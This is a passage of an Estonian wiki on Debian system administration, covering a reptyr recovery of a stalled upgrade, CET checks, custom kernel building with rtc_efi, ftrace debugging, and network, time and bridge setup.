==> Modified (by you or by a script) since installation.
==> Package distributor has shipped an updated version.
What would you like to do about it ? Your options are:
Y or I : install the package maintainer's version
N or O : keep your currently-installed version
D : show the differences between the versions
Z : start a shell to examine the situation
The default action is to keep your current version.
*** timesyncd.conf (Y/I/N/O/D/Z) [default=N] ?
</pre>

Ning terminali olukord

<pre>
root@tm-tartu-x470:~# ps auxf | less -N
..
135 root 1097 0.0 1.8 74500 18448 ? S Oct13 0:05 apt-get dist-upgrade
136 root 23408 0.0 0.6 11768 6388 pts/1 Ss+ Oct13 0:01 \_ /usr/bin/dpkg --status-fd 25 --configure --
...
</pre>

Osutub, et terminaliga saab taas kontakti öeldes, ja jätkates seejärel sisestusi peatunud kohast. NB! reptyr töötamine jätkub nö pimedast kohast, klaviatuurilt tuleb sisestada nii nagu asjakohane, nt antud juhul Enter sobib küsimusele 'timesyncd.conf (Y/I/N/O/D/Z) [default=N]' eitavalt vastamiseks

<pre>
root@tm-tartu-x470:~# /home/imre/reptyr 23408
[-] Timed out waiting for child stop.

Setting up libevent-core-2.1-7:amd64 (2.1.12-stable-8) ...
Setting up libatomic1:amd64 (12.2.0-14) ...
Setting up libvariable-magic-perl (0.63-1+b1) ...
Setting up udev (252.30-1~deb12u2) ...
Setting up libevent-2.1-7:amd64 (2.1.12-stable-8) ...
Setting up libio-html-perl (1.004-3) ...
Setting up libss2:amd64 (1.47.0-2) ...
Setting up libpod-parser-perl (1.65-1) ...
Setting up autopoint (0.21-12) ...
Setting up libb-hooks-op-check-perl:amd64 (0.22-2+b1) ...
</pre>

Seejärel jätkub apt-get dist-upgrade osakonnaga suhtlemine tavalisel viisil.

===CET - Intel Control-flow Enforcement Technology===

Protsessori tugi

<pre>
root@pve-01:~# lscpu | grep -i shstk
Flags: fpu vme de pse ... user_shstk ...
</pre>

ning nt https://www.intel.com/content/www/us/en/products/sku/232391/intel-xeon-gold-6448h-processor-60m-cache-2-40-ghz/specifications.html

<pre>
Intel® Control-Flow Enforcement Technology
</pre>

Kerneli tugi

<pre>
root@pve-01:~# grep SHADOW /boot/config-6.8.4-3-pve
CONFIG_X86_USER_SHADOW_STACK=y
</pre>

programmi tugi, 'Properties: x86 feature: IBT, SHSTK'

<pre>
root@trainer-01-rws:~# readelf -n /usr/sbin/sshd

Displaying notes found in: .note.gnu.property
Owner Data size Description
GNU 0x00000020 NT_GNU_PROPERTY_TYPE_0
Properties: x86 feature: IBT, SHSTK
x86 ISA needed: x86-64-baseline

Displaying notes found in: .note.gnu.build-id
Owner Data size Description
GNU 0x00000014 NT_GNU_BUILD_ID (unique build ID bitstring)
Build ID: 652d8ffe728a6800d02ee146e82201f0080069de

Displaying notes found in: .note.ABI-tag
Owner Data size Description
GNU 0x00000010 NT_GNU_ABI_TAG (ABI version tag)
</pre>

käesolev olukord

<pre>
root@pve-01:~# cat /proc/2266/status | grep -i thread_fe
x86_Thread_features:
x86_Thread_features_locked:
</pre>

Kasulikud lisamaterjalid

* https://en.wikipedia.org/wiki/Control-flow_integrity
* https://ubuntu.com/blog/whats-new-in-security-for-ubuntu-24-04-lts

===pigz abil pakkimine===

# time tar -I pigz -cf ../20250507/rakendus-14-main_ee-20250507.tgz main_ee

===Debian v. 13 Trixie kerneli kompileerimine===

Väited

* tegevused toimuvad pve v. 8.4 virtuaalses arvutis, uefi jne
* kompileerimiseks on vajalik ca 40 G ruumi failisüsteemis
* arvutil on 32 cpu ja 24g mälu
* kompileerimine võtab aega ca 10 minutit

Nt eesmärgiga lisada süsteemi rtc_efi tuuma moodul ning käivitamisel lülitada välja rtc_cmos moodul, tavaliselt paistab rtc nii

<pre>
root@pm60-trt:~# dmesg | grep rtc
[ 5.472677] rtc_cmos 00:01: RTC can wake from S4
[ 5.477720] rtc_cmos 00:01: registered as rtc0
[ 5.482245] rtc_cmos 00:01: setting system clock to 2025-07-05T17:49:27 UTC (1751737767)
[ 5.490391] rtc_cmos 00:01: alarms up to one month, y3k, 114 bytes nvram
</pre>

Kompileerimine

<pre>
# apt-get install build-essential libncurses-dev
# apt-get build-dep linux
# linux-source-6.12

# su - imre
$ mkdir 20251001
$ cd 20251001
$ tar xaf /usr/src/linux-source-6.12.tar.xz
$ cd linux-source-6.12
</pre>

Kostümiseerimine

<pre>
imre@kernel-deb-13-01:~/20251001/linux-source-6.12$ cp /boot/config-6.12.48+deb13-amd64 .config
imre@kernel-deb-13-01:~/20251001/linux-source-6.12$ make menuconfig
imre@kernel-deb-13-01:~/20251001/linux-source-6.12$ joe drivers/rtc/Kconfig
imre@kernel-deb-13-01:~/20251001/linux-source-6.12$ joe .config
imre@kernel-deb-13-01:~/20251001/linux-source-6.12$ make menuconfig

imre@kernel-deb-13-01:~/20251001-2/linux-source-6.12$ diff /boot/config-6.12.48+deb13-amd64 .config
5c5
< CONFIG_CC_VERSION_TEXT="x86_64-linux-gnu-gcc-14 (Debian 14.2.0-19) 14.2.0"
---
> CONFIG_CC_VERSION_TEXT="gcc (Debian 14.2.0-19) 14.2.0"
36a37
> CONFIG_BUILD_SALT=""
999a1001
> CONFIG_MODULE_SIG_ALL=y
8486c8488
< CONFIG_RTC_DRV_CMOS=y
---
> CONFIG_RTC_DRV_CMOS=m
8492a8495
> CONFIG_RTC_DRV_EFI=m
10868a10872
> CONFIG_MODULE_SIG_KEY="certs/signing_key.pem"
10870a10875
> CONFIG_SYSTEM_TRUSTED_KEYS=""

imre@kernel-deb-13-01:~$ diff orig/linux-source-6.12/drivers/rtc/Kconfig 20251001/linux-source-6.12/drivers/rtc/Kconfig
1180c1180
< depends on EFI && !X86
---
> depends on EFI

imre@kernel-deb-13-01:~/20251001/linux-source-6.12$ make -j 32 bindeb-pkg
</pre>

Tulemusena

<pre>
root@kernel-deb-13-01:~# ls -ld /home/imre/20251001/linux-*
-rw-r--r-- 1 imre imre 9175852 Oct 2 00:07 /home/imre/20251001/linux-headers-6.12.48_6.12.48-2_amd64.deb
-rw-r--r-- 1 imre imre 109643260 Oct 2 00:07 /home/imre/20251001/linux-image-6.12.48_6.12.48-2_amd64.deb
-rw-r--r-- 1 imre imre 999103852 Oct 2 00:08 /home/imre/20251001/linux-image-6.12.48-dbg_6.12.48-2_amd64.deb
-rw-r--r-- 1 imre imre 1395812 Oct 2 00:06 /home/imre/20251001/linux-libc-dev_6.12.48-2_amd64.deb
-rw-rw-r-- 1 imre imre 6109 Oct 2 00:09 /home/imre/20251001/linux-upstream_6.12.48-2_amd64.buildinfo
-rw-rw-r-- 1 imre imre 2260 Oct 2 00:09 /home/imre/20251001/linux-upstream_6.12.48-2_amd64.changes
</pre>

Paigaldamine

<pre>
root@kernel-deb-13-01:~# dpkg -i /home/imre/20251001/linux-image-6.12.48_6.12.48-2_amd64.deb

root@kernel-deb-13-01:~# find /lib/modules/6.12.48 -name rtc-efi\* -ls
559702 8 -rw-r--r-- 1 root root 4708 Oct 2 00:05 /lib/modules/6.12.48/kernel/drivers/rtc/rtc-efi.ko.xz
</pre>

Kasutamine, nt grub bootloaderisse sekkumisel näidata

<pre>
linux /boot/vmlinuz-6.12.48 root=/dev/mapper/system-root ro efi=runtime modprobe.blacklist=rtc_cmos
initrd /boot/initrd.img-6.12.48
</pre>

Tulemusena

<pre>
root@kernel-deb-13-01:~# uname -a
Linux kernel-deb-13-01 6.12.48 #2 SMP PREEMPT_DYNAMIC Thu Oct 2 00:05:59 EEST 2025 x86_64 GNU/Linux

root@kernel-deb-13-01:~# dmesg -T | grep rtc
[Thu Oct 2 00:11:10 2025] Command line: BOOT_IMAGE=/boot/vmlinuz-6.12.48 root=/dev/mapper/system-root ro efi=runtime modprobe.blacklist=rtc_cmos
[Thu Oct 2 00:11:10 2025] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-6.12.48 root=/dev/mapper/system-root ro efi=runtime modprobe.blacklist=rtc_cmos
[Thu Oct 2 00:11:11 2025] rtc-efi rtc-efi.0: registered as rtc0
[Thu Oct 2 00:11:11 2025] rtc-efi rtc-efi.0: setting system clock to 2025-10-01T21:11:09 UTC (1759353069)

root@kernel-deb-13-01:~# hwclock --show
2025-10-02 01:35:16.360299+03:00
</pre>

Kasulikud lisamaterjalid

* 'Building a custom kernel from Debian kernel source' - https://kernel-team.pages.debian.net/kernel-handbook/ch-common-tasks.html#s-common-building

===Kerneli siseste funktsioonide debugimine===

Sedasi saab veenduda, et hwclock kasutab peale eelmises punktis tehtud muudatuse 'efi runtime services' osakonda (mitte klassikalist rfc_cmos osakonda)

<pre>
root@kernel-deb-13-01:/sys/kernel/tracing# cat /sys/kernel/tracing/available_filter_functions | grep efi_ | grep time
root@kernel-deb-13-01:/sys/kernel/tracing# cd /sys/kernel/tracing
root@kernel-deb-13-01:/sys/kernel/tracing# echo > trace
root@kernel-deb-13-01:/sys/kernel/tracing# echo nop > current_tracer
root@kernel-deb-13-01:/sys/kernel/tracing# echo > set_ftrace_filter
root@kernel-deb-13-01:/sys/kernel/tracing# echo efi_read_time > set_ftrace_filter
root@kernel-deb-13-01:/sys/kernel/tracing# echo function > current_tracer
root@kernel-deb-13-01:/sys/kernel/tracing# echo 1 > tracing_on

root@kernel-deb-13-01:/sys/kernel/tracing# hwclock --show & echo "before $! after"
[1] 1525
before 1525 after
root@kernel-deb-13-01:/sys/kernel/tracing# 2025-10-02 03:05:13.888490+03:00

[1]+ Done hwclock --show

root@kernel-deb-13-01:/sys/kernel/tracing# echo 0 > tracing_on

root@kernel-deb-13-01:/sys/kernel/tracing# cat trace | head -n 15
# tracer: function
#
# entries-in-buffer/entries-written: 1458/1458 #P:32
#
# _-----=> irqs-off/BH-disabled
# / _----=> need-resched
# | / _---=> hardirq/softirq
# || / _--=> preempt-depth
# ||| / _-=> migrate-disable
# |||| / delay
# TASK-PID CPU# ||||| TIMESTAMP FUNCTION
# | | | ||||| | |
hwclock-1525 [003] ..... 10443.012235: efi_read_time <-__rtc_read_time
hwclock-1525 [003] ..... 10443.012346: efi_read_time <-__rtc_read_time
hwclock-1525 [003] ..... 10443.012425: efi_read_time <-__rtc_read_time
</pre>

kus

* hwclock käsk antakse ja küsitakse tema pid väärtust
* trace failis on fikseeritud pid mis oli seotud efi_read_time funktsiooni väljakutsumisega

===netconsole===

TODO

===Kasulikud lisamaterjalid===

* [[:Operatsioonisüsteemi Debian GNU/Linux paketihalduse kasutamine]]
* http://www.debian.org/security/
* http://www.debian-administration.org/
* http://wiki.debian.org/
* http://www.debian.org/distrib/packages
* http://debian.org/doc/maint-guide
* http://www.debianadmin.com/
* http://debian.catsanddogs.com/
* http://debconf9.debconf.org/ - sisaldab videosalvestusi Debiani arendajate esinemistest DebConfidel
* http://cdimage.debian.org/cdimage/unofficial/non-free/firmware/lenny/current/
* http://debian-live.alioth.debian.org/
* http://www.emdebian.org/

Operatsioonisüsteemi Debian GNU/Linux kasutamine

2026-05-03T22:44:53Z

Imre: /* Capabilities */

===Debian GNU/Linux===

Debian GNU/Linux ehk lühidalt Debian on vaba operatsioonisüsteem, mis kasutab Linux või FreeBSD tuuma ning töötab paljudel populaarsetel riistvaralistel platvormidel, sealhulgas 32 bit ja 64 bit x86 arvutid.

Debiani sobib kasutada nii serveritel kui ka töökohaarvutitel sh süleritel. Debianile on iseloomulik

* korrektselt ilmuvad turvaparandused (teated ilmuvad ka bugtraqis)
* eeskujulik paketihaldus, sh automaatne pakettide autentsuse valideerimine kontrollsummade abil (MD5sum, SHA1, SHA256)
* rahulik stabiilsete versioonide ilmumise tsükkel, erinevalt närvilisest ja suhteliselt pikk tugi eelmisele stabiisele versioonile
* väärikas kasutajaskond (ingl. k. community)
* tarkvara jagatakse kompileeritud ja lähtetekstipakettide kujul

Debiani kodulehe http://www.debian.org/ tiitel ütleb, et tegemist on universaalse operatsioonisüsteemiga, mille tunnistuseks on ehk tõepoolest asjaolu, et Debiani on kasutatud mitmete teiste nn Linuxi distributsioonide aluseks.

Debian on loodud Ian Murdock'i poolt aastal 1993, kusjuures operatsioonisüsteemi nimi on tuletatud autori ja tema abikaasa Debra eesnimedest.

===Operatsioonisüsteemi paigaldamise ettevalmistamine===

Debiani kasutamiseks on vajalik sobiv riistvara, näiteks tõenäoliselt praktiliselt suvaline 32 bit või 64 bit x86 arvuti sobib, alatest 486 PC mudelitest kuni HP DL 585 G5 ja IBM x3250 taoliste serveriteni. Riistvara sobivuse määrab põhiliselt operatsioonisüsteemi tuum, 2013 aastal on stabiilsel Debiani versioonil 7.0 selleks Linux tuuma versioon 3.2.0.

Lisaks tuleks enne operatsioonisüsteemi paigaldamist otsutada, mida arvutiga teha soovitakse, sh võiks kujutada ette milline saab olema

* arvuti nimi ja ip aadress
* kõvaketaste kasutus
* kas arvutit kasutatakse serveri või töökohana
* kuhu arvuti füüsiliselt paigutatakse
* kes vastutab arvuti haldamise eest (tarkvara uuendamine, süsteemi monitoorimine ja varundus/taaste)

Üks otsekohene moodus operatsioonisüsteemi paigladmiseks on kasutada Debiani peeglites (ingl. k. mirror) jagatavat CD tõmmisest valmistatud bootivat CD plaati, kuna kõige populaarsem platvorm on x86, siis märgime, et

* 64 bit AMD ja Inteli arvutitel kasutamiseks sobib Debiani amd64 arhitektuur
* 32 bit AMD ja Inteli arvutitel kasutamiseks sobib Debaini i386 arhitektuur

Kuivõrd reeglina AMD ja Inteli 64 bit arvutid on 32 bit-ühilduvad, siis kasutades 32 bit operatsioonisüsteemi tarkvara 64 bit riistvaral käitub arvuti nagu 32 bitine arvuti. Kuigi eelpool on mainitud nimeliselt AMD ja Intelit kehtib öeldu ka teiste tootjate x86 platvormide kohta. Järgnevas on näited toodud konkreetsuse huvides 64 bit keskkonna kohta, kuid põhimõtteliselt toimub tegevus samamoodi ka 32 bit keskkonnas toimetades. Lisaks saab valida mitmete nö eriotstarbeliste tuumade hulgast, nt i386 non-pae, tuuma nimes kasutatakse '486' sel juhul.

Niisiis, kui kasutada on 64 bit x86 riistvara tuleks kopeerida esimene amd64 arhitektuuri CD tõmmis, näiteks aadressilt http://cdimage.debian.org/debian-cd/7.0.0/amd64/iso-cd/debian-7.0.0-amd64-CD-1.iso ning kirjutada CD plaadile. Plaadi kirjutamisel peab jälgima, et tõmmist ei kirjutata plaadile mitte nagu suurt faili, vaid kirjutatakse tõmmisena, vastasel korral arvuti ei boodi sellelt plaadilt. Debian v. 7.0 on rangelt eristatud vabad ja suletud koodiga draiverid, kõige nähtavamalt mõjutab see tõenäoliselt operatsioonisüsteemi paigaldamise protseduur kui on tegemist vastava riistvaraga, http://www.debian.org/releases/stable/amd64/ch06s04.html.en.

USB pulgalt paigaldades tundub, et uuemal ajal on .iso tõmmised nii ettevalmistatud (isohybrid techniques), et need saab lihtsalt dd programmiga kopeerida pulgale ja töötab, https://wiki.debian.org/BootUsb

# dd if=/tmp/debian-7.0.0-amd64-CD-1.iso of=/dev/sdc bs=4M

Kui Debian paigaldatakse arvutile, kus juba on operatsioonisüsteem installeritud, nt Win7, siis tõenäoliselt õnnestub installeriga töötamise ajal Win7 failisüsteemide ja partitsioonide suurusi kahandada, tehes nii ruumi Debiani jaoks. Selleks tuleb kõvaketta seadistamise menüüvalikus öelda 'Manual' ja sealt edasi. Kirjanduse põhjal saab öelda, et vastvaid NTFS failisüsteeme ei ole tarvis eelnevalt defragmenteerida.

Windows operatsioonisüsteemi all sobib USB pulk tekitada UUI (Universal USB Installer) programmiga, mille kasutamise juhised leiab aadressilt http://www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/.

===Operatsioonisüsteemi paigaldamine===

Tuleb arvestada, et operatsioonisüsteemi paigaldamisel hävivad eelnevalt kõvaketastel olnud andmed. Peale paigaldusmeedialt arvuti käivitamist käivitatakse automaatselt operatsioonisüsteemi installer, mis näeb tekstrežiimis välja selline (alternatiivina esineb installeri kasutajaliides ka graafilises vormis)

[[Pilt:Debian-installer-v7.gif]]

Installeri kasutamine on intuatiivne, paigaldamise tulemusena tekib iseseisvalt bootiv arvuti. Paigaldamise käigus sooritatakse järgmised otsustused ja tegevused

* kõvaketakste kasutamine
* võrguseadistused
* tarkvarakomplekti valik (standard, töökoht, server)
* juurkasutaja parool
* paigaldatakse alglaadur (ingl. k. bootloader) GRUB

Peale paigaldamist saab arvutisse konsoolilt sisse logida ja teatatakse midagi sellist

Linux loomaaed 2.6.26-2-xen-686 #1 SMP Wed May 16 23:50:09 UTC 2009 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Mar 29 23:06:53 2009 from aix.auul
mart@loomaaed:~$

Oluline on tähale panna, et muu hulgas räägib Debian oma kasutustingimustest

* Debian GNU/Linux süsteemis sisalduv tarkvara on vaba tarkvara
* Debian GNU/Linux süsteemil kasutamisega ei kaasne garantiid

Paigaldamise lõpus küsitakse, kas on soov osaleda nn populaarsus-võistluses, kord nädalas hakkab arvuti saatma paigaldatud pakettide nimekirja arendajatele, tulemused avaldadakse aadressil http://popcon.debian.org/.

===Operatsioonisüsteemi paigaldamine üle serial konsooli===

Serial konsooli eksitab splash, sellest saab lahti vajutades Esc. Seejärel tuleb sisestada

boot: install console=ttyS0,9600

===Community===

Debian GNU/Linux osas suhtlemiseks või niisama tutvumiseks saab kasutada selliseid ressursse

* Veebikoht - http://www.debian.org/
* Wiki - http://wiki.debian.org/
* Postiloendid asuvad aadressil http://lists.debian.org/
* Uudised - http://www.debian.org/News/project/
* Turvaparandusi puudutavad teadaanded - http://www.debian.org/security/

===Operatsioonisüsteemi varundamine ja taaste===

Operatsioonisüsteemi varundamiseks sobib kasutada programmi rsync kopeerides kogu failisüsteemi va kataloogid

* /tmp
* /proc
* /sys

teisele arvutile.

Süsteemi taastamiseks tuleb arvuti bootida nt RIP-Linuxi CD plaadilt, seadistada võrk, kopeerida varundatud süsteem ja paigaldada bootloader.

===IP aadress===

Staatilise IP aadressi saab Debianile seadistada failist

/etc/network/interfaces

Tüüpiliselt võiks see välja näna järgnev

# The loopback interface
auto lo
iface lo inet loopback

# The first network card - this entry was created during the Debian installation
# (network, broadcast and gateway are optional)
auto eth0

iface eth0 inet static
address 192.168.1.10
netmask 255.255.255.0
network 192.168.1.0
broadcast 192.168.1.255
gateway 192.168.1.1

===Arvuti nimi ja resolver===

Arvutil peab oleme korrektselt seadistatud nimi ning nimesüsteemi kasutamine. Arvuti nimi on kirjas failis /etc/hostname, näiteks

bassein

ning failis /etc/hosts on kirjas nö staatiline nimelahendus, mis töötab päri-ja pöördteisenduse jaoks, lihtsal juhul on seal sellised read (kusjuures esimest rida tuleb kasutada sõna-sõnalt)

127.0.0.1 localhost.localdomain localhost
192.168.1.20 bassein.loomaaed.tartu.ee bassein

Peale nende failide sisu muutmist tuleb muudatuste kehtestamiseks öelda

bash# hostname bassein

Õnnestunud muudatuse kinnituseks ütleb arvuti nii

bash# hostname
bassein
bash# hostname -f
bassein.loomaaed.tartu.ee

Selleks, et arvuti lahendaks muid nimesid, peab olema kirjas nimeserveri aadress failis /etc/resolv.conf

nameserver 192.168.1.254

Kusjuures, kui failis /etc/resolv.conf kasutada mitut sellist rida erinevate nimeserverite aadressidega, siis proovitakse igal nimelahendusel neid järjest läbi kuni jõutakse esimese töötavani. Vaikimisi oodatakse vastust 5 sekundit. Täiendavat infot saab resolveri manuaalist öeldes

# man resolver

Tihtipeale kasutatakse keskkonnamuutujat PS1 prompti kujundamiseks ja mille väärtuse moodustamisel kasutatakse omakorda käsku hostname. Seetõttu muutub promptis oleva arvuti nime väärtus peale välja ja uuesti sisselogimist.

====resolvconf====

Lenny sisaldab lisaks nö staatilisele resolverile dünaamilist resolvconf tarkvara, asjakohane allikas on aadressil http://wiki.debian.org/NetworkConfiguration

Tarkvara paigaldamiseks tuleb öelda

# apt-get install resolvconf

Osa olulisi faile asub kataloogis

/etc/resolvconf

resolvconf oskab /etc/network/interfaces failist kasutada dns-nameservers parameetrit, nt selliselt

...
auto eth0
iface eth0 inet static
address 192.168.10.199
gateway 192.168.10.254
netmask 255.255.255.0
broadcast 192.168.10.255
dns-nameservers 192.168.10.254

===Kellaaeg===

Arvuti kellaaeg on korrektselt juhul kohalik aeg. See sõltub ajavööndi seadistusest, mis võiks Eestis olla

# ls -l /etc/localtime
lrwxrwxrwx 1 root root 34 Jul 15 21:40 /etc/localtime -> /usr/share/zoneinfo/Europe/Tallinn

Vajadusel tuleks eemaldada /etc/locatime ja öelda

# ln -s /usr/share/zoneinfo/Europe/Tallinn /etc/localtime

Seadistamiseks sobib kusjuures kasutada pigem ehk utiliiti dpkg-reconfigure öeldes

# dpkg-reconfigure tzdata

====Kellaaja esitamine ja seadistamine programmiga date====

Töötava süsteemi käest saab küsida aega öeldes

$ date
Sat Jan 8 14:07:25 EET 2011

Lisaks saab küsida nt nö kaks nädalat tagasi, sellest on vahel kasu nt varundamisega seotud skriptides

$ date -d "2 weeks ago"
Sat Dec 25 14:07:25 EET 2010

====Kellaaja esitamine ja seadistamine programmiga rdate====

Openrdate http://sourceforge.net/apps/mediawiki/openrdate on OpenBSD projekti rdate tarkvara port Linuxile. Tarkvara paigaldamiseks tuleb öelda

# apt-get install rdate

Kellaja ühekordne seadmine toimub öeldes

# rdate ajaserver.loomaaed.tartu.ee

rdate võimaldab suhelda kahte tüüpi ajaserveritega

* http://tools.ietf.org/html/rfc868 server - tavaliselt töötab inetd abil ja teenindab portidel 37/tcp või 37/udp
* http://tools.ietf.org/html/rfc2030 - tavaliselt töötab pordil 123/udp

rdate võtmetega saab juhtida, millist režiimi klient parasjagu kasutab, nt

$ rdate -4 -p -n ntp.ut.ee
Sat Jan 8 14:09:44 EET 2011

kus

* -4 - IPv4 protokoll
* -p - ainult küsida aega ja mitte seadistada
* -n kasutada rfc2030 ajaserverit

Vaikimisi pöördub rdate ajaserveri poole kasutades rfc686 protokolli ja 37/tcp porti.

====Kellaaja esitamine ja seadistamine programmiga ntpdate====

Tarkvara paigaldamiseks tuleb öelda

# apt-get install ntpdate

ntpdate sobib kellaaja küsimiseks rfc2060 protokolli toetavalt serverilt (kasutades 123/udp porti) ning kohaliku süsteemi kellaaja seadmiseks. Ainult kellaaja küsimiseks sobib kasutada võtit -q

$ ntpdate -p 2 -q ntp.ut.ee ntp.aso.ee
server 2001:bb8:2002:500:211:25ff:fe8f:7d64, stratum 2, offset 0.011371, delay 0.10133
server 193.40.5.113, stratum 2, offset 0.000782, delay 0.03786
server 195.80.105.226, stratum 1, offset 0.000217, delay 0.03523
8 Jan 15:35:55 ntpdate[20870]: adjust time server 195.80.105.226 offset 0.000217 sec

kus

* -p 2 - igalt toodud ajaserverilt küsitakse aega kaks korda
* -q - aega ainult küsitakse ja ei seadistata
* vastust küsitakse kolmelt ajaserverilt kuna ntp.ut.ee nimel on A ja AAAA kirjed

Algupärane ntpdate programm ise ei kasuta ühtegi seadistusfaili, kuid Debian keskkonnas on lisaks programm ntpdate-debian, mida juhib seadistusfail /etc/default/ntpdate mille abil saab juhtida, milliseid ajaservereid kasutatakse. Vaikimisi on seadistatud rida

NTPDATE_USE_NTP_CONF=yes

mis tähendab, et kasutatakse ajaservereid ntp paketi tarkvara seadistusfailist /etc/ntp.conf. Kui ntpd programm töötab, siis ntpdate keeldub aega seadmast.

====Kellaaja esitamine ja seadistamine tarkvaraga ntp====

Kellaaja sünkronisseerimiseks sobib kasutada paketti ntp

# apt-get install ntp

NTP tarkvara juhivad kaks seadistusfaili

* /etc/default/ntp - milles sisaldub vaikimisi rida ja mis tähendab, et ntpd programmi käivitamisel seadistatakse kellaaeg nö kiiresti

NTPD_OPTS='-g'

* /etc/ntp.conf - seadistusfail, kus näidatakse ajaserverid jms parameetrid

Seadistusfailist /etc/ntp.conf tuleb leida read

server 0.debian.pool.ntp.org
server 1.debian.pool.ntp.org
server 2.debian.pool.ntp.org
server 3.debian.pool.ntp.org

ning soovi korral asendada need oma teenese pakkuja nime kasutava ühe reaga, nt

server ajaserver.loomaaed.tartu.ee

Kulub mõni aega, nt 10 minutit kuni ntp töötamine stabiliseerub, sellest annab tunnistust, et ntptrace vastab kus arvuti asub ntp hierarhias, nt midagi sellist

# ntptrace -n
127.0.0.1: stratum 3, offset -0.001927, synch distance 0.038145
192.168.30.8: stratum 2, offset -0.000066, synch distance 0.020106
192.168.30.15: stratum 1, offset 0.000010, synch distance 0.002270, refid 'GPS'

võib ka küsida sarnaselt (see väljund ei ole eelmisega näitega kooskõlas)

# ntpq -np
remote refid st t when poll reach delay offset jitter
==============================================================================
10.192.0.53 193.40.5.113 3 u 47 64 37 0.646 -22.260 73.828

====Kellaaja esitamine ja seadistamine tarkvaraga openntpd====

ntp tarkvarale on populaarne alternatiiv openntpd, üks praktiline erinevus on nt selles, et ntp sisaldab ntptrace utiliiti. OpenNTPD ei sisaldu Debian Squeeze paketihalduses.

====Märkused====

Selleks, et Xen domU kellaaega mõjutaks domU sees töötav ntp server tuleb öelda

bash# sysctl -w xen.independent_wallclock=1

või lisada faili /etc/sysctl.conf rida

xen.independent_wallclock=1

Leap sekundite käsitlemine toimub tavaliselt kahel võimalikul viisil

* lisatakse äkki sekund ära

# dmesg
..
[14255112.244045] Clock: inserting leap second 23:59:60 UTC

* määritakse sekundi lisandumine pikema perioodi peale

===Võrgu seadistamine seadistusfailidega===

Võrguseadmete seadistamine toimub faili /etc/networks/interfaces abil. Selle faili sisu alusel kehtestatakse võrguseadistused arvuti alglaadimisel või öeldes arvuti töötamisel

# /etc/init.d/networking restart

Failis saab kasutada sellised sektsioone

====lo ja eth võrguseadme seadistamine====

auto lo
iface lo inet loopback

auto eth0
iface eth0 inet static
address 192.168.10.10
gateway 192.168.10.254
netmask 255.255.255.0

====dummy võrguseadme seadistamine====

auto dummy0
iface dummy0 inet static
address 192.168.13.251
netmask 255.255.255.0
network 192.168.13.0
broadcast 192.168.13.255

Kui on soov kasutada enam kui ühte dummy seadet, tuleb laadida dummy moodul sarnaselt

# modprobe dummy numdummies=5

VLAN kasutamist tutvustatakse punktis http://kuutorvaja.eenet.ee/wiki/VLAN_kasutamine#Linux.27i_kasutamine_mode_trunk_re.C5.BEiimis

===Silla kasutamine===

Silla (ingl. k. bridge) kasutamine toimub paketis bridge-utils utiliitidega, paigaldamiseks tuleb öelda

# apt-get install bridge-utils

Nt tekitame silla eth1 ja tap0 seadmetega

# brctl addbr br0
# brctl addif br0 eth1
# brctl addif br0 eth2

Silla omadusi saab küsida öeldes

# brctl show
bridge name bridge id STP enabled interfaces
br0 8000.00064f320035 yes eth1
eth2

Silla kasutamiseks peavad olema seadmed üleval, nt silla üles tõstmiseks tuleb öelda

# brctl br0 up

Silla saab eemaldamiseks tuleb sild alla lasta, eemaldada seadmed ning lõpuks sild

# brctl br0 down
# brctl delif br0 eth1
# brctl delif br0 eth2
# brctl delbr br0

Sillale saab seadistada ka ip aadressi, nii nagu paljudele muudele võrguseadmetele

# ifconfig br0 192.168.1.200 netmask 255.255.255.0

Tulemusena paistab

# ifconfig br0
br0 Link encap:Ethernet HWaddr 00:17:42:02:0b:8a
inet addr:192.168.1.250 Bcast:192.168.1.255 Mask:255.255.255.0
inet6 addr: fe80::5c63:deff:fe92:e125/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:38 errors:0 dropped:0 overruns:0 frame:0
TX packets:17 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:2008 (1.9 KiB) TX bytes:3101 (3.0 KiB)

kusjuures bridge mac aadressina kasutatakse vaikimisi kõige väiksemat mac aadressi bridge külge ühendatud seadmetest, st see aadress võib muutuda bridge töötamise käigus. mac aadressi saab ka muuta, nt

# ifconfig br0 hw ether 70:01:68:00:12:50

STP (Spanning Tree Protocol) sisselülitamiseks tuleb öelda

# brctl stp br0 on

ja silla STP info esitamiseks

# brctl showstp br0
br0
bridge id 8000.00064f320035
designated root 8000.00064f320035
root port 0 path cost 0
max age 20.00 bridge max age 20.00
hello time 2.00 bridge hello time 2.00
forward delay 15.00 bridge forward delay 15.00
ageing time 300.01
hello timer 1.49 tcn timer 0.00
topology change timer 0.00 gc timer 5.49
flags

eth1 (1)
port id 8001 state disabled
designated root 8000.00064f320035 path cost 4
designated bridge 8000.00064f320035 message age timer 0.00
designated port 8001 forward delay timer 0.00
designated cost 0 hold timer 0.00
flags

eth2 (2)
port id 8002 state forwarding
designated root 8000.00064f320035 path cost 4
designated bridge 8000.00064f320035 message age timer 0.00
designated port 8002 forward delay timer 0.00
designated cost 0 hold timer 0.48
flags

kust on näha, et

* antud juhtumil on silla üks komponent välja lülitatud

Sillaga seotud mac aadresside esitamiseks tuleb öelda

# brctl showmacs br0
port no mac addr is local? ageing timer
2 00:06:4f:32:00:35 yes 0.00
1 00:06:4f:63:e3:d7 yes 0.00
2 00:0c:42:07:1a:45 no 0.04
2 00:16:3e:00:00:01 no 83.98
2 00:1c:c0:38:89:07 no 22.58
2 70:01:68:00:11:45 no 227.43
2 70:01:68:01:02:49 no 33.48

Kasulikud lisamaterjalid

* http://en.wikipedia.org/wiki/Bridging_(networking)
* http://tldp.org/HOWTO/BRIDGE-STP-HOWTO/index.html
* http://en.wikipedia.org/wiki/Spanning_tree_protocol
* http://en.wikipedia.org/wiki/LAN_switching
* http://backreference.org/2010/07/28/linux-bridge-mac-addresses-and-dynamic-ports/

===Võrgu seadistamine programmiga ip===

Programm ip võimaldab Linuxi kaasaegsetes 2.4 ja 2.6 tuumades sisalduva võrguliideste toega oluliselt paindlikumalt ümber käia
kui ifconfig. Näited käsudest, mida on ohutu anda töötavas masinas.

====Seadmed====

# ip link show
1: lo: mtu 16436 qdisc noqueue
